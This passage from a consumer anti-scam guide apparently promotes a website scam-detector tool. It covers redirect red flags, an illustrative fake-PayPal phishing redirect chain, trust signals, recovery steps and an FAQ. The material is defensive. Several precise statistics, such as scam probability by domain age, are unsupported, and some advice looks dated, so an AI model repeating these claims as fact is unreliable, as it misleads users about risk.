        print("❌ High risk (6+ redirects, likely scam)")

# Test
analyze_redirects("http://suspicious-site.com")

Redirect Red Flags:

Red Flag                    Risk Level   Explanation
────────────────────────────────────────────────────────────────────
0-2 redirects              ✅ Normal     HTTP→HTTPS, www canonicalization
3-5 redirects              ⚠️  Medium    Ad tracking, affiliate links
6+ redirects               ❌ High       Hiding destination, scam likely
Cross-domain redirects     ❌ High       Multiple different domains
Redirect to different TLD  ❌ Critical   .com → .tk (domain change)
Redirect loop              ❌ Critical   Broken or malicious
Redirect after form submit ❌ Critical   Credential theft then redirect

Real-World Scam Example:

Phishing Email Link:

Email text: "Click here to verify your PayPal account"
Link shown: paypal.com/verify (FAKE - hover shows real URL)
Real URL: http://paypal-verify[.]tk/check

Redirect chain:
1. http://paypal-verify.tk/check
   → 302 redirect
2. http://tracker.xyz/?id=victim123
   → 302 redirect (logs IP, browser)
3. http://paypa1.com/signin
   → Final destination (fake PayPal login)

Stolen data:
   - Credentials entered on fake paypa1.com
   - Victim info logged by tracker.xyz
   - 30 seconds later, site shuts down

How to Trace Real URL:

Hover Before Clicking:

Browser shows link destination in bottom-left corner
Compare: Displayed text vs actual URL

Display: paypal.com
Actual:  http://paypal-verify.tk
❌ Mismatch = Scam

URL Expanders:

Shortened URLs (bit.ly, tinyurl.com) hide destination

Before clicking:
1. Copy shortened URL
2. Paste into: https://www.expandurl.net/
3. View real destination
4. Check if legitimate

7. Contact Information & Trust Signals

What We Verify:

Physical Address:

Legitimate:
  123 Main Street
  Suite 400
  San Francisco, CA 94105
  United States

  Verification:
  1. Google Maps: Street View shows real building ✅
  2. Business registry: Matches state records ✅
  3. Phone verification: Listed number connects ✅

Scam:
  "123 Main St, USA" (vague, incomplete) ❌
  PO Box only (no physical location) ❌
  Residential address (not business) ❌
  Fake address (Google Maps: empty lot) ❌

Phone Number:

Legitimate:
  +1 (800) 123-4567

  Checks:
  ✅ Country code matches business location
  ✅ Toll-free (800, 888, 877) for customer service
  ✅ Listed on official company website
  ✅ Connects to real call center

Scam:
  No phone number listed ❌
  Only email contact ❌
  Foreign country code for "US business" ❌
  Disconnected number ❌
  VoIP/burner number ❌

Email Address:

Legitimate:
  support@paypal.com
  └─ @paypal.com (matches company domain) ✅

Scam:
  support@paypal-secure.tk ❌ (different domain)
  contact@gmail.com ❌ (free email provider)
  noreply@company.info ❌ (suspicious TLD)

Social Media Presence:

Legitimate:
  ✅ Verified accounts (blue checkmark)
  ✅ Thousands of followers
  ✅ Regular posting (not abandoned)
  ✅ Customer interactions
  ✅ Established accounts (years old)

Scam:
  ❌ No social media presence
  ❌ Recently created accounts (<30 days)
  ❌ Few followers (<100)
  ❌ Stock photos, no real engagement
  ❌ No verification badge

Business Registration:

US Businesses:
1. Secretary of State lookup (each state)
   Example: https://businesssearch.sos.ca.gov/
2. Search: Company name
3. Verify:
   - Active status ✅
   - Registration date (matches WHOIS)
   - Registered agent address
   - Business type (LLC, Corporation, etc.)

No registration found = Not a real business ❌

Trust Seals & Certifications:

Legitimate Seals:

✅ BBB Accredited Business (verify at bbb.org)
✅ Norton Secured (verify SSL certificate)
✅ TRUSTe Privacy Certified
✅ McAfee Secure
✅ SSL.com certificate badge

Verification:
- Click seal → Should link to verification page
- Scams use fake images that don't link

Fake Seals:

❌ Image-only badges (no link)
❌ Links to fake verification pages
❌ Misspelled certification names
❌ Seals for non-existent organizations

Privacy Policy & Terms:

Legitimate:

✅ Detailed privacy policy (5+ pages)
✅ Legal language (attorney-drafted)
✅ Specific data collection practices
✅ GDPR/CCPA compliance mentioned
✅ Recent update date
✅ Contact information for privacy officer

Example: https://www.paypal.com/privacy

Scam:

❌ No privacy policy
❌ Generic template (copied from another site)
❌ 1-2 paragraphs only
❌ No specific company details
❌ Broken English, grammar errors
❌ No update date or very old

About Us Page:

Legitimate:

✅ Company history (founded when, by whom)
✅ Team photos (real people, searchable on LinkedIn)
✅ Office locations with addresses
✅ Awards, certifications, partnerships
✅ Press mentions (verify with Google News)

Example: https://www.amazon.com/about

Scam:

❌ Stock photos labeled as "our team"
❌ Vague history ("established to serve customers")
❌ No verifiable information
❌ Copied text from other sites
❌ No real names or bios

Customer Reviews:

Where to Check:

1. Google Reviews (Google Maps)
2. Trustpilot (trustpilot.com)
3. Better Business Bureau (bbb.org)
4. Reddit (search: "[company name] scam")
5. ScamAdvisor (scamadviser.com)

Legitimate Reviews:

✅ Mix of positive and negative (realistic)
✅ Detailed, specific feedback
✅ Varied writing styles
✅ Posted over months/years
✅ Verified purchase tags
✅ Company responds to reviews

Fake Reviews:

❌ All 5-star reviews (too perfect)
❌ Generic text ("Great product!", "Highly recommend")
❌ Same writing style/grammar
❌ All posted on same dates (bulk upload)
❌ No verified purchases
❌ No company responses

Tools and Resources

Official Scam Detection Tools

Orbit2x Scam Detector:

👉 Analyze Website Safety Now
Features:
- 7-point security analysis
- SSL certificate validation
- Domain age WHOIS lookup
- DNS health check
- Phishing pattern detection
- TLD risk assessment
- Redirect chain analysis
- Risk scoring (0-100)
- Instant results (5-30 seconds)
- Detailed breakdown of findings

Complementary Orbit2x Security Tools

Domain & SSL Verification:

SSL Certificate Checker - Validate HTTPS encryption
Domain Age Checker - Check WHOIS registration date
DNS Lookup Tool - Analyze DNS configuration

Network Security:

IP Lookup - Geolocate servers and check reputation
HTTP Status Checker - Verify redirects and response codes
Headers Analyzer - Check security headers

Email & Communication:

Email Validator - Verify email addresses
URL Shortener Checker - Expand shortened URLs

External Scam Detection Resources

Government & Law Enforcement:

Federal Trade Commission (FTC) - Report fraud, scam database
FBI Internet Crime Complaint Center (IC3) - Report cybercrime
CISA Cybersecurity Alerts - Government security warnings
Better Business Bureau (BBB) - Business verification, scam tracker

Security Organizations:

Anti-Phishing Working Group (APWG) - Phishing statistics and reports
PhishTank - Community phishing site database
VirusTotal - Multi-engine malware scanner
Google Safe Browsing - Check site safety status

Scam Databases:

ScamAdvisor - Website trust ratings
Scamwatch (Australia) - Scam reports and alerts
Action Fraud (UK) - UK fraud reporting
Canadian Anti-Fraud Centre - Canadian scam reports

Browser Extensions:

Netcraft Extension - Phishing protection
Web of Trust (WOT) - Crowdsourced website ratings
Avast Online Security - Real-time threat blocking

Email Verification:

MXToolbox - Email server analysis
MailTester - Email spam score checker
Hunter.io - Email verification and company lookup

Learning Resources

Educational Guides:

FTC Scam Alerts - Latest scam warnings
StaySafeOnline.org - Cybersecurity education
Krebs on Security - Investigative security journalism
SANS Internet Storm Center - Threat intelligence

Academic Resources:

Phishing Attacks Research - Wikipedia overview
Social Engineering Tactics - Psychology of scams
IEEE Security & Privacy - Academic papers

Reporting Scams:

ReportFraud.ftc.gov - FTC complaint assistant
IC3.gov - FBI cybercrime reports
PhishTank Submission - Submit phishing URLs
Google Safe Browsing Report: transparencyreport.google.com/safe-browsing/report

Best Practices and Quick Reference

Scam Detection Rules of Thumb

✅ Always check HTTPS (but know HTTPS ≠ safe)
✅ Verify domain spelling (paypal.com not paypa1.com)
✅ Check domain age (<30 days = high risk)
✅ Look for contact info (phone, address, email)
✅ Search “[company] scam” on Google
✅ Trust your instincts (too good = too fake)
✅ Use credit cards (not wire transfer, crypto, gift cards)
✅ Enable 2FA (limits damage if credentials stolen)

Quick Decision Matrix

Indicator	Safe	Suspicious	Scam
HTTPS	Valid SSL	Self-signed	None
Domain Age	1+ years	30-365 days	<30 days
WHOIS	Public info	Privacy protected	Offshore
Contact	Full details	Email only	None
Reviews	Mixed, detailed	Few, generic	None/fake
Price	Market rate	20-30% off	50-90% off
Payment	Credit card	PayPal	Wire/crypto only

Red Flag Checklist

Immediate Warnings (Close Site):

No HTTPS or “Not Secure” warning
Misspelled domain (g00gle.com, amaz0n.com)
Free TLD (.tk, .ml, .ga, .cf, .gq)
“Urgent!” or “Account suspended!” language
Requests SSN, passwords, or banking via email
Payment only via wire transfer, crypto, gift cards
Price too good to be true (iPhone for $99)

Verify Independently:

Domain age less than 90 days
Privacy-protected WHOIS
No phone number or physical address
No social media presence
Generic “About Us” page
Stock photos labeled as team
Only positive reviews (no negatives)

What to Do If You’ve Been Scammed

Immediate Actions (First Hour):

1. Document Everything:

- Screenshot website (full page)
- Save all emails
- Copy transaction IDs
- Note dates, times, amounts
- Save chat logs

2. Contact Financial Institutions:

Credit Card:
  - Call issuer immediately
  - Request chargeback
  - Freeze card

Bank Account:
  - Report unauthorized transactions
  - Request account freeze
  - File fraud claim

PayPal/Venmo:
  - Report transaction
  - Request buyer protection

3. Change Passwords:

Priority order:
1. Email (most critical)
2. Banking/financial
3. Social media
4. Shopping accounts
5. All other accounts

Enable 2FA on all accounts

Report to Authorities (First Day):

4. File Official Reports:

Federal Trade Commission:
  https://reportfraud.ftc.gov/
  - Select scam type
  - Provide details
  - Upload evidence

FBI IC3:
  https://www.ic3.gov/
  - Financial crimes
  - Dollar amounts
  - Suspect information

Local Police:
  - File report (get case number)
  - Needed for identity theft affidavit

5. Credit Monitoring (First Week):

Fraud Alert:
  - Contact one credit bureau
  - 1-year fraud alert placed
  - Free, renewable

Credit Freeze:
  - Equifax: equifax.com/freeze
  - Experian: experian.com/freeze
  - TransUnion: transunion.com/freeze
  - Prevents new accounts

Monitor:
  - Free annual reports: annualcreditreport.com
  - Check for unauthorized accounts
  - Dispute fraudulent entries

Long-Term Protection:

6. Identity Theft Recovery (Ongoing):

IdentityTheft.gov:
  - FTC recovery plan
  - Step-by-step guide
  - Customized checklist
  - Letters to creditors

7. Scam Site Takedown:

Report to registrar:
  - WHOIS lookup → Find registrar
  - Submit abuse complaint
  - Include evidence

Report to hosting:
  - IP WHOIS → Find host
  - Email abuse@[hosting-company]
  - Request takedown

Google Safe Browsing:
  - Submit malicious URL
  - Google may block in Chrome

Prevention for Future:

Use password manager (unique passwords)
Enable 2FA everywhere
Use virtual credit cards (Privacy.com, Revolut)
Check URLs before clicking
Verify independently (don’t trust emails)
Use our Scam Detector before entering info

Conclusion: Protecting Yourself from Online Scams

Key Takeaways

1. Scams are Sophisticated and Growing

$10.3 billion lost in 2023 (up 17% from 2022)
467,000 new phishing sites monthly
Even HTTPS sites can be scams (80% of phishing uses HTTPS)
Social engineering exploits psychology, not just technology

2. Multi-Factor Analysis is Essential

No single indicator is definitive (use all 7 checks)
SSL + Domain Age + DNS + Content = Comprehensive assessment
Automated tools reduce human error and save time
Risk scoring provides objective measurement

3. Domain Age is the Strongest Indicator

97% of phishing sites use domains <30 days old
Legitimate businesses have established web presence
Check WHOIS before entering any personal information

4. Trust Your Instincts

If it seems too good to be true, it is
Urgency is a red flag (legitimate sites don’t threaten)
Verify independently (don’t click email links)
When in doubt, don’t proceed

5. Use the Right Tools

Our Scam Detector provides instant 7-point analysis
SSL Checker validates HTTPS certificates
Domain Age Tool checks WHOIS registration
DNS Lookup analyzes infrastructure

Scam Prevention Checklist

Before Entering Personal Info:

Run scam detector analysis (7-point check)
Verify domain spelling exactly
Check domain age (>30 days minimum)
Confirm HTTPS with valid certificate
Search “[company name] scam” on Google
Verify contact information (phone, address)
Check reviews on independent sites
Confirm payment methods (credit card available)

For Online Shopping:

Domain age >90 days
Business registration verified
Physical address exists (Google Maps)
Phone number connects
Return policy clearly stated
Credit card payment available
Realistic pricing (not 70%+ off)

For Financial Transactions:

Navigate directly to site (don’t click email links)
Verify URL in address bar
Check for EV certificate (green bar for banks)
Confirm 2FA is required
Call bank using number on card (not email)

Next Steps

1. Test Suspicious Sites:
👉 Analyze Website Now

Enter URL for instant analysis
Review 7-point security check
Get risk score (0-100)
View detailed breakdown

2. Verify Domain Information:

Domain Age Checker - Check WHOIS
SSL Certificate Checker - Validate HTTPS
DNS Lookup - Analyze infrastructure

3. Explore Security Tools:

All 50+ Tools - Complete security toolkit
Technical Blog - Security guides
Contact Us - Report scams

4. Report Scams:

FTC Complaint Assistant - File federal report
FBI IC3 - Report cybercrime
PhishTank - Submit phishing URLs

Frequently Asked Questions (FAQ)

Q: How can I tell if a website is a scam?

A: Use a multi-factor approach combining technical and behavioral indicators:

Instant Red Flags (99% Scam):

No HTTPS or “Not Secure” warning in browser
Misspelled domain: paypa1.com, g00gle.com (number substitution)
Free TLD: .tk, .ml, .ga, .cf, .gq domains
Urgent language: “Account suspended!”, “Verify now or lose access!”
Impossible prices: iPhone 15 for $99, Rolex for $50
Wire transfer only: No credit card, only crypto/wire/gift cards

Technical Verification Steps:

Step 1: Check Domain Age (Most Important)

Use our Domain Age Checker: /domain-age

High Risk: 0-30 days old (97% of scams)
Medium Risk: 31-90 days (verify independently)
Low Risk: 91+ days (still verify other factors)
Trusted: 1+ years old

Step 2: Validate SSL Certificate

Click padlock icon → View certificate
Check:
  ✅ Issued to correct domain (exact match)
  ✅ Valid date range (not expired)
  ✅ Trusted CA (Let's Encrypt, DigiCert, etc.)
  ❌ Self-signed (scam indicator)

Step 3: Verify Contact Information

Look for:
  ✅ Physical address (verify on Google Maps)
  ✅ Phone number (call to verify)
  ✅ Company email (@company.com, not @gmail.com)
  ❌ No contact info (major red flag)
  ❌ Only email contact

Step 4: Search for Scam Reports

Google: "[company name] scam"
Check: Reddit, BBB, Trustpilot, ScamAdvisor

Red flags:
  - Multiple scam reports
  - BBB complaints
  - Reddit warnings
  - No online presence (for "established" business)

Step 5: Use Automated Tools

Our Scam Detector: /scam-detector
Provides:
  - 7-point security analysis
  - Risk score (0-100)
  - SSL validation
  - Domain age check
  - DNS analysis
  - Phishing detection
  - TLD risk assessment

Decision Matrix:

Risk Score	Meaning	Action
0-19	Low Risk	Proceed with caution
20-44	Medium Risk	Verify independently
45-69	High Risk	Avoid personal info
70-100	Critical Risk	Close immediately

When in Doubt:

Don’t enter personal information
Call company using number from official website (not email)
Search for official social media to verify
Check BBB, Trustpilot, Google Reviews
Trust your instincts (if it feels wrong, it probably is)

Q: Can a website with HTTPS still be a scam?

A: YES! HTTPS does NOT guarantee legitimacy.

The Misconception:
Many people believe: “Padlock icon = Safe website” ❌ FALSE

The Reality:

80% of phishing sites now use HTTPS
Let’s Encrypt provides free SSL certificates to anyone (including scammers)
HTTPS only means: “Connection is encrypted” (prevents eavesdropping)
HTTPS does NOT mean: “Website is trustworthy”

What HTTPS Actually Protects:

HTTPS Does:

✅ Encrypt data between you and server
✅ Prevent ISP from seeing your traffic
✅ Protect against man-in-the-middle attacks
✅ Verify you’re connected to the domain in address bar

HTTPS Does NOT:

❌ Verify the business is legitimate
❌ Guarantee website safety
❌ Prevent phishing/scams
❌ Check domain age or reputation

Example Scam with HTTPS:

Legitimate PayPal:

URL: https://www.paypal.com
SSL: Valid, issued to PayPal Inc.
Certificate: Extended Validation (EV)
Company: PayPal Inc., verified entity

Scam Site with HTTPS:

URL: https://paypa1-secure.com
SSL: Valid, issued by Let's Encrypt ✅ (FREE certificate)
Certificate: Domain Validation (DV) - no business verification
Domain Age: 8 days old ❌
WHOIS: Privacy protected ❌
Company: Not verified ❌

Both have HTTPS, but only one is legitimate!

Why Scammers Use HTTPS:

Browser warnings: HTTP shows “Not Secure” → scares visitors
User trust: People think HTTPS = safe
Free certificates: Let’s Encrypt automated, instant
Legitimacy appearance: Looks professional

How to Properly Verify:

Don’t Just Check:

❌ Padlock icon alone

Do Check:

Domain spelling: Exact match to real company
Certificate issuer: EV certificate for banks (green bar)
Domain age: 30+ days minimum
WHOIS data: Registered to legitimate company
Contact info: Verifiable phone, address
Reviews: Google, BBB, Trustpilot

Certificate Types:

Domain Validation (DV) - Low Trust:

Verifies: You control the domain
Cost: Free (Let’s Encrypt)
Issue time: Minutes (automated)
Used by: 95% of websites (legit + scams)
⚠️ Scammers can get these easily

Extended Validation (EV) - High Trust:

Verifies: Legal business entity (extensive documentation)
Cost: $100-500/year
Issue time: Days (manual verification)
Used by: Banks, financial institutions
Browser: Shows company name in address bar (some browsers)
✅ Scammers rarely use (expensive, requires documentation)

Checking Certificate Type:

Browser:

1. Click padlock icon
2. View certificate
3. Look for:
   DV: Only domain name in subject
   EV: Company name, verified legal entity

What Banks Use:

Bank of America: EV Certificate ✅
Chase: EV Certificate ✅
Wells Fargo: EV Certificate ✅

Scam bank sites: DV Certificate ❌ (or self-signed)

Bottom Line:

HTTPS = Encrypted connection (prevents snooping)
HTTPS ≠ Trustworthy website
Always verify domain, age, contact info, reviews
Use our Scam Detector for comprehensive analysis

Q: How old should a domain be to trust it?

A: Minimum 30 days, but 90+ days is safer. Here’s why:

Scam Domain Lifespan Statistics:

Age Range	Scam Probability	Explanation
0-7 days	97%	Fresh phishing attack
8-14 days	85%	Active scam campaign
15-30 days	75%	Scam or very new business
31-90 days	40%	Startup or scam (verify independently)
91-365 days	15%	Established presence (lower risk)
1-2 years	5%	Legitimate business
3+ years	<2%	Trusted, long-standing site
10+ years	<0.5%	Highly trusted (Amazon, Google, etc.)

Why Scammers Use New Domains:

Economics:

Domain cost: $10-15/year
Attack window: 24-72 hours
Victim count: 5-50 victims
Average loss: $1,000-5,000 per victim
ROI: 500-25,000% (highly profitable)

Disposal Strategy:

Day 1: Register domain, clone target site
Day 2-3: Send phishing emails, steal credentials
Day 4: Domain blacklisted, shut down
Day 5: Register new domain, repeat

Age-Based Trust Levels:

0-30 Days (HIGH RISK):

Assumptions:
  - 97% of phishing sites
  - Scammer testing attack
  - Not yet blacklisted

Action:
  ❌ Do NOT enter personal info
  ❌ Do NOT make payments
  ✅ Only proceed if:
      - Verified business registration
      - Called company directly
      - Confirmed social media
      - Found press mentions

31-90 Days (MEDIUM RISK):

Could be:
  - Legitimate startup
  - New product launch
  - Rebranded company
  - Scam that survived 30 days

Action:
  ⚠️ Proceed with caution
  ✅ Verify independently:
      - Business license
      - BBB registration
      - Physical address (visit or call)
      - Company registration
      - LinkedIn profiles of employees

91-365 Days (LOW RISK):

Likely:
  - Established business
  - Survived initial startup phase
  - Built some reputation

Action:
  ✅ Check reviews (Trustpilot, Google, BBB)
  ✅ Verify contact information
  ✅ Still run scam detector (rare exceptions exist)

1+ Years (VERY LOW RISK):

Highly likely:
  - Legitimate, established business
  - Invested in long-term presence
  - Built customer base

Action:
  ✅ Standard verification (reviews, contact info)
  ✅ Trust but verify

Checking Domain Age:

Method 1: Our Tool

Visit: /domain-age
Enter: example.com
Result:
  Creation Date: 1995-08-14
  Age: 29 years, 3 months
  Risk: ✅ Trusted

Method 2: WHOIS Lookup

whois example.com | grep -i "creation date"
Creation Date: 1995-08-14T04:00:00Z

Calculate age: Current date - Creation date

Method 3: Archive.org

Visit: https://web.archive.org/
Enter: example.com
View: Historical snapshots

Shows:
  - First snapshot date (confirms age)
  - Design changes over time
  - Legitimate businesses have long history
  - Scams have no/fake history

Exceptions (New Domains That Are Safe):

Product Launches:

Example: iPhone 15 Pro launch
  - Apple registers iphone15pro.com
  - Domain age: 7 days
  - BUT: Announced by Apple officially
  - Verify: apple.com announcement

Action: Verify through main company site

Rebranding:

Example: Twitter → X
  - x.com registered in 1996 but repurposed 2023
  - New branding announced officially
  - Redirects from twitter.com

Action: Check for official announcement

Country-Specific Domains:

Example: Company expands to new country
  - amazon.com.au (Australia)
  - May be newer than amazon.com
  - BUT: Registered by same company

Action: Verify parent company owns domain

How to Verify New Domains:

Business Registration:

1. Search: "[State] Secretary of State business search"
2. Enter company name
3. Verify:
   - Active status
   - Registration date matches or predates domain
   - Registered agent address

Press Mentions:

Google News: "[company name]"
Check:
  - Legitimate press (not just press releases)
  - Announced product/service
  - Quoted executives (verify on LinkedIn)

Social Media:

Find official accounts:
  - Twitter/X verification badge
  - Facebook verified page
  - LinkedIn company page
  - Check follower counts (thousands+)
  - Look for established history (years of posts)

Bottom Line:

30 days minimum (97% of scams filtered out)
90 days recommended (safer threshold)
1+ year ideal (very low risk)
New domains: Verify through official channels first
Use tools: Our Domain Age Checker for instant verification

Q: What should I do if I entered my information on a scam site?

A: Act immediately! Time is critical. Follow these steps in order:

IMMEDIATE (Next 15 Minutes):

1. Change Passwords (Most Critical)

Priority order:
✅ Email (FIRST - controls password resets)
✅ Banking/financial accounts
✅ PayPal, Venmo, payment apps
✅ Social media (Facebook, Instagram, Twitter)
✅ Shopping sites (Amazon, eBay)
✅ All other accounts

Password requirements:
  - Unique (different for each account)
  - Strong (12+ characters, mixed case, numbers, symbols)
  - Not reused from scam site
  - Use password manager (LastPass, 1Password, Bitwarden)

2. Enable Two-Factor Authentication (2FA)

Enable on ALL accounts:
  ✅ Email (Gmail, Outlook)
  ✅ Banking
  ✅ Social media
  ✅ Payment apps

Preferred methods (in order):
  1. Hardware key (YubiKey, Google Titan)
  2. Authenticator app (Google Authenticator, Authy)
  3. SMS (better than nothing, but can be hijacked)

3. Contact Your Bank/Card Issuer

Credit Card:
  - Call number on back of card
  - Report: "Fraudulent website, potential unauthorized charges"
  - Request: Card freeze or replacement
  - Result: Charges reversed (Visa/Mastercard protection)

Debit Card:
  - Call bank immediately
  - Request: Account freeze
  - Monitor: Unauthorized transactions
  - File: Fraud claim (less protection than credit cards)

Bank Account:
  - If you provided routing/account number
  - Request: Account number change
  - Monitor: ACH withdrawals
  - Enable: Transaction alerts

WITHIN 1 HOUR:

4. Check for Fraudulent Activity

Email:
  - Check sent folder (scammers may send emails as you)
  - Review login history (Gmail: Details link, Outlook: Recent activity)
  - Check filters (scammers may hide notifications)

Bank:
  - Review all recent transactions
  - Set up: Mobile alerts for all transactions >$0
  - Check: Pending transactions

Credit Cards:
  - Review charges
  - Dispute: Any fraudulent transactions
  - Freeze: Card if any suspicious activity

5. Run Security Scans

Antivirus:
  - Windows Defender (Windows)
  - Update definitions
  - Run full scan

Malware Scanner:
  - Download: Malwarebytes (free)
  - Run: Full system scan
  - Quarantine: Any threats found

Browser:
  - Clear: Cache, cookies, history
  - Check: Installed extensions (remove suspicious)
  - Reset: Browser settings (if malware suspected)

WITHIN 24 HOURS:

6. File Official Reports

Federal Trade Commission (FTC):
  URL: https://reportfraud.ftc.gov/
  Provide:
    - Scam website URL
    - Date, time, amount
    - Information provided
    - Screenshots (if available)

FBI Internet Crime Complaint Center (IC3):
  URL: https://www.ic3.gov/
  For: Financial crimes over $1,000
  Include: All transaction details

Local Police:
  - File report (get case number)
  - Bring: Printed evidence
  - Needed for: Identity theft affidavit

7. Monitor Your Identity

Credit Freeze (FREE):
  - Equifax: https://www.equifax.com/personal/credit-report-services/credit-freeze/
  - Experian: https://www.experian.com/freeze/center.html
  - TransUnion: https://www.transunion.com/credit-freeze

  Effect: Prevents new accounts from being opened

Fraud Alert (FREE):
  - Call one bureau (they notify others)
  - Duration: 1 year (renewable)
  - Effect: Creditors must verify identity before issuing credit

Credit Monitoring:
  - Free: Credit Karma, Mint
  - Paid: IdentityGuard, LifeLock ($10-30/month)
  - Watch for: Unauthorized accounts, inquiries

WITHIN 1 WEEK:

8. Request Credit Reports

Free Annual Report:
  URL: https://www.annualcreditreport.com/
  Frequency: Once per year per bureau (3 total)

Check for:
  ✅ Unknown accounts
  ✅ Unauthorized inquiries
  ✅ Incorrect personal info
  ✅ Fraudulent addresses

Dispute Process:
  - Online dispute (fastest)
  - Provide evidence
  - Follow up in 30 days

9. Social Security Monitoring (If SSN Provided)

If you gave SSN to scam:
  ⚠️ High risk of identity theft

Immediate:
  - Credit freeze (all 3 bureaus)
  - File identity theft report: IdentityTheft.gov
  - Consider: IRS PIN (prevents tax fraud)

IRS IP PIN:
  URL: https://www.irs.gov/identity-theft-fraud-scams/get-an-identity-protection-pin
  Prevents: Tax refund fraud
  Free: For previous victims or at-risk individuals

10. Help Take Down Scam Site

Report to Registrar:
  1. WHOIS lookup: Find domain registrar
  2. Visit registrar's abuse page
  3. Submit: Phishing/scam report with evidence

Report to Hosting Provider:
  1. IP WHOIS: Find hosting company
  2. Email: abuse@[hosting-company].com
  3. Include: Full details, screenshots

Google Safe Browsing:
  URL: https://safebrowsing.google.com/safebrowsing/report_phish/
  Effect: Chrome may block site for other users

PhishTank:
  URL: https://www.phishtank.com/add_web_phish.php
  Effect: Shared with security vendors

ONGOING:

11. Stay Vigilant

Next 90 days:
  ✅ Check bank statements daily
  ✅ Review credit card charges
  ✅ Monitor credit reports monthly
  ✅ Watch for phishing emails (scammers may retry)
  ✅ Be suspicious of calls/emails requesting info

Next 12 months:
  ✅ Keep credit freeze active
  ✅ Renew fraud alert
  ✅ Check credit reports quarterly
  ✅ Document all suspicious activity

What NOT to Do:

❌ Wait to “see what happens” (act immediately)
❌ Reuse the compromised password anywhere
❌ Contact scammers (ignore their follow-up emails)
❌ Pay “recovery fees” (scam-within-a-scam)
❌ Panic (follow steps methodically)

Resources:

IdentityTheft.gov: Personalized recovery plan
FTC Scam Alerts: Latest scam warnings
Credit Karma: Free credit monitoring
Our Scam Detector: Verify sites before entering info

Prevention Next Time:

✅ Use our Scam Detector before entering info
✅ Check Domain Age (30+ days minimum)
✅ Verify SSL Certificate validity
✅ Never click email links (navigate directly to sites)
✅ Use virtual credit cards (Privacy.com, Revolut)
✅ Enable 2FA everywhere

Ready to check if a website is safe?

👉 Analyze Website Now

Protect Yourself:

All Security Tools - Complete protection suite
Technical Blog - Security guides and tips
Report Scams - Help us protect others

Last updated: November 2025

Keywords: scam detector, phishing detection, website security, fraud prevention, fake website checker, ssl validator, domain age checker, dns lookup, malware scanner, url safety, online scam protection, identity theft prevention, email phishing, credit card fraud, fake online stores, investment scams, tech support scams, romance scams, website legitimacy checker, internet fraud detection

Scam Detector Complete Guide: Phishing Detection, Website Security Analysis & Fraud Prevention

Introduction: The $10 Billion Online Scam Crisis

The “Verify Your Account” Email That Cost $47,000

The Devastating Reality of Online Scams (2025)

Who Needs Scam Detection Tools?

Quick Answer: How to Spot Scam Websites

Understanding Scam Detection: Technical Deep Dive

What is Scam Detection? (The Science)

The Anatomy of a Phishing Attack

Common Scam Types (Taxonomy)

1. Credential Phishing

2. E-Commerce Scams

3. Investment Scams

4. Tech Support Scams

5. Romance Scams

The 7-Point Security Analysis System

1. SSL/TLS Certificate Validation

2. Domain Age & WHOIS Analysis

3. DNS Configuration Health

4. Content Safety & Phishing Pattern Scan

5. TLD (Top-Level Domain) Risk Assessment

6. HTTP Redirect Chain Analysis

7. Contact Information & Trust Signals

Tools and Resources

Official Scam Detection Tools

Complementary Orbit2x Security Tools

External Scam Detection Resources

Learning Resources

Best Practices and Quick Reference

Scam Detection Rules of Thumb

Quick Decision Matrix

Red Flag Checklist

What to Do If You’ve Been Scammed

Conclusion: Protecting Yourself from Online Scams

Key Takeaways

Scam Prevention Checklist

Next Steps

Frequently Asked Questions (FAQ)

Q: How can I tell if a website is a scam?

Q: Can a website with HTTPS still be a scam?

Q: How old should a domain be to trust it?

Q: What should I do if I entered my information on a scam site?

Related Articles

SSL Certificate Checker Complete Guide: Verify, Monitor & Fix Certificate Errors (2025)

HTTP Headers Analyzer Complete Guide: Security Headers, Caching, CORS & Performance (2025)

Domain Age Checker Complete Guide: WHOIS Lookup, Trust Score & SEO Impact (2025)

Found This Guide Helpful?

Share This Article

Stay Updated